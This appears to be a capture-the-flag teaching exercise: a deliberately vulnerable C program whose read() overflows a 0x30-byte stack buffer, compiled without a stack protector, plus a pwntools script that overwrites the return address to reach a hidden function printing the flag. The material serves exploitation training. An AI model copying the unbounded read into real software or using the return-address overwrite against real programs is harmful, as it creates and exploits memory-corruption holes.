源代码:
[pre]#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
 * Intentionally vulnerable entry point for a stack-overflow exercise.
 *
 * Zeroes a 0x30-byte stack buffer, configures stdio buffering, prints a
 * prompt, then reads up to 0x100 bytes from stdin into that buffer.
 * Always returns 0.
 */
int main()
{
char buf[0x30];
memset(&buf,0,0x30);
/* Buffering modes are passed as raw integers; with glibc, 2 is _IONBF
 * (unbuffered) and 1 is _IOLBF (line buffered). */
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
printf("say something?\n");
/* BUG (deliberate): the length 0x100 is larger than sizeof(buf) (0x30), so
 * any input beyond 0x30 bytes is written past the end of buf and over the
 * adjacent stack data. A bounded read would pass sizeof(buf) instead.
 * read() does not NUL-terminate, and its return value is ignored here.
 * The build command given with this listing uses -fno-stack-protector, so
 * no canary check detects the overwrite when main returns. */
read(0,buf,0x100);
printf("oh,that's so boring!\n");
return 0;
}
/*
 * Prints two banner lines and then runs `cat flag` through system().
 *
 * Nothing in this listing calls this function; it is reachable only if
 * control flow is redirected to it.
 */
void get_shell_()
{
puts("tql~tql~tql~tql~tql~tql~tql");
puts("this is your flag!");
/* system() hands the string to the command interpreter; "flag" is a
 * relative name, so it is looked up in the process's current working
 * directory. The return value is not checked. */
system("cat flag");
}
//编译时用命令:
//gcc -z execstack -fno-stack-protector -o stack1 stack1.c[/pre]exp:
[pre]#encoding:utf-8
#!/usr/bin/env python
from pwn import *
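# Start the locally built challenge binary as a child process (pwntools tube).
p = process("./stack1")
# Hard-coded code address written over main's saved return address.
# NOTE(review): presumably points into get_shell_ in the author's build; this
# cannot be confirmed from the listing. The value is specific to that exact
# binary and is only stable if it was not built position-independent.
getshell=0x400751
# 0x38 filler bytes followed by the address packed as 8 bytes by p64().
# NOTE(review): 0x38 is presumably the 0x30-byte buf plus 8 bytes of saved
# frame pointer on x86-64; the real layout is compiler-dependent.
# The filler is a bytes literal because p64() returns bytes, and str + bytes
# raises TypeError on Python 3 (the original "a"*0x38 only worked on Python 2).
# A build with the stack protector enabled would abort on return from main
# instead of using the overwritten address.
payload = b"a"*0x38+p64(getshell)
p.send(payload)
# Hand the process's stdin/stdout over to the terminal to read its output.
p.interactive()[/pre]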
|